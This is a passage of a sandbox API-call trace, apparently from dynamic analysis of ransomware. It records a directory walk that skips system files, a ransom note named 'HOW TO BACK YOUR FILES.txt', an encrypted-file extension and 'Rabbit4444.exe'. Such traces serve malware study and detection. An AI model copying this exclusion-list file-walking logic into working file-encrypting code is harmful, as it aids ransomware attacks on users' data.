-1 [0055.854] lstrcmpiW (lpString1="Microsoft.LockApp_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.LockApp_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.LockApp_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.854] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.LockApp_cw5n1h2txyewy" | out: lpString1="Microsoft.LockApp_cw5n1h2txyewy") returned="Microsoft.LockApp_cw5n1h2txyewy" [0055.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d420 [0055.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8e) returned 0x11eb00 [0055.854] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d428 | out: ListHead=0xf68b0, ListEntry=0x11d428) returned 0x11d188 [0055.854] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3517066f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xfbf856cf, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xfbf856cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Messaging_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.MES")) returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.Messaging_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.Messaging_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.Messaging_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.854] lstrcmpiW (lpString1="Microsoft.Messaging_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.Messaging_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.Messaging_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.854] lstrcmpiW (lpString1="Microsoft.Messaging_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.Messaging_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.854] lstrcmpiW (lpString1="Microsoft.Messaging_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.Messaging_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.854] lstrcmpiW (lpString1="Microsoft.Messaging_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.854] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Messaging_8wekyb3d8bbwe" | out: lpString1="Microsoft.Messaging_8wekyb3d8bbwe") returned="Microsoft.Messaging_8wekyb3d8bbwe" [0055.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d380 [0055.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x92) returned 0x114098 [0055.854] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d388 | out: ListHead=0xf68b0, ListEntry=0x11d388) returned 0x11d428 [0055.854] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ee3238, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xf9f55962, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf9f55962, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", cAlternateFileName="MIC2FD~1.MIC")) returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.855] lstrcmpiW (lpString1="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.855] lstrcmpiW (lpString1="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.855] lstrcmpiW (lpString1="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.855] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe" | out: lpString1="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe") returned="Microsoft.Microsoft3DViewer_8wekyb3d8bbwe" [0055.855] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d260 [0055.855] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa2) returned 0x1190a8 [0055.855] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d268 | out: ListHead=0xf68b0, ListEntry=0x11d268) returned 0x11d388 [0055.855] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a401dd0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdc4fe9ef, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xdc92abfb, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.MIC")) returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftEdge_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.855] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.MicrosoftEdge_8wekyb3d8bbwe" | out: lpString1="Microsoft.MicrosoftEdge_8wekyb3d8bbwe") returned="Microsoft.MicrosoftEdge_8wekyb3d8bbwe" [0055.855] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d2c0 [0055.855] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9a) returned 0x10c9d0 [0055.855] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d2c8 | out: ListHead=0xf68b0, ListEntry=0x11d2c8) returned 0x11d268 [0055.855] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x317ff574, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xf9428887, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf9428887, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.MIC")) returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.855] lstrcmpiW (lpString1="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.856] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe" | out: lpString1="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe") returned="Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe" [0055.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d3a0 [0055.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa4) returned 0x118ff8 [0055.856] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d3a8 | out: ListHead=0xf68b0, ListEntry=0x11d3a8) returned 0x11d2c8 [0055.856] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2d8aac99, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xdba259a9, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xdba259a9, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", cAlternateFileName="MICROS~3.MIC")) returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.856] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe" | out: lpString1="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe") returned="Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe" [0055.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d2a0 [0055.856] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x10ca78 [0055.856] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d2a8 | out: ListHead=0xf68b0, ListEntry=0x11d2a8) returned 0x11d3a8 [0055.856] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd8bcdb78, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd8c4028f, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd8c4028f, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", cAlternateFileName="MICROS~4.MIC")) returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.856] lstrcmpiW (lpString1="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.857] lstrcmpiW (lpString1="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.857] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe" | out: lpString1="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe") returned="Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe" [0055.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d1c0 [0055.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa8) returned 0x118c88 [0055.857] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d1c8 | out: ListHead=0xf68b0, ListEntry=0x11d1c8) returned 0x11d2a8 [0055.857] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd7d33450, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd7dcbdba, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd7dcbdba, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.MSPaint_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.MSP")) returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.MSPaint_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.MSPaint_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.MSPaint_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.857] lstrcmpiW (lpString1="Microsoft.MSPaint_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.MSPaint_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.MSPaint_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.857] lstrcmpiW (lpString1="Microsoft.MSPaint_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.MSPaint_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.857] lstrcmpiW (lpString1="Microsoft.MSPaint_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.MSPaint_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.MSPaint_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.857] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.MSPaint_8wekyb3d8bbwe" | out: lpString1="Microsoft.MSPaint_8wekyb3d8bbwe") returned="Microsoft.MSPaint_8wekyb3d8bbwe" [0055.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d200 [0055.857] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8e) returned 0x11ef28 [0055.857] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d208 | out: ListHead=0xf68b0, ListEntry=0x11d208) returned 0x11d1c8 [0055.857] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf27b049c, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x33b4c3b0, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x33b4c3b0, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_8")) returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.857] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.857] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.857] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.857] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.858] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe" | out: lpString1="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe") returned="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe" [0055.858] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d280 [0055.858] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x121c70 [0055.858] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d288 | out: ListHead=0xf68b0, ListEntry=0x11d288) returned 0x11d208 [0055.858] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x104f57a, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x33dfacc4, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x33dfacc4, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.1_8")) returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.858] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe" | out: lpString1="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe") returned="Microsoft.NET.Native.Framework.1.1_8wekyb3d8bbwe" [0055.858] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d2e0 [0055.858] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x121d28 [0055.858] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d2e8 | out: ListHead=0xf68b0, ListEntry=0x11d2e8) returned 0x11d288 [0055.858] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xebee37c7, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xebf2fc88, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xebf2fc88, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.3_8")) returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.858] lstrcmpiW (lpString1="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.858] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe" | out: lpString1="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe") returned="Microsoft.NET.Native.Framework.1.3_8wekyb3d8bbwe" [0055.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d3c0 [0055.859] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb0) returned 0x121de0 [0055.859] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d3c8 | out: ListHead=0xf68b0, ListEntry=0x11d3c8) returned 0x11d2e8 [0055.859] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x266a19e6, ftCreationTime.dwHighDateTime=0x1d32719, ftLastAccessTime.dwLowDateTime=0x34036ffb, 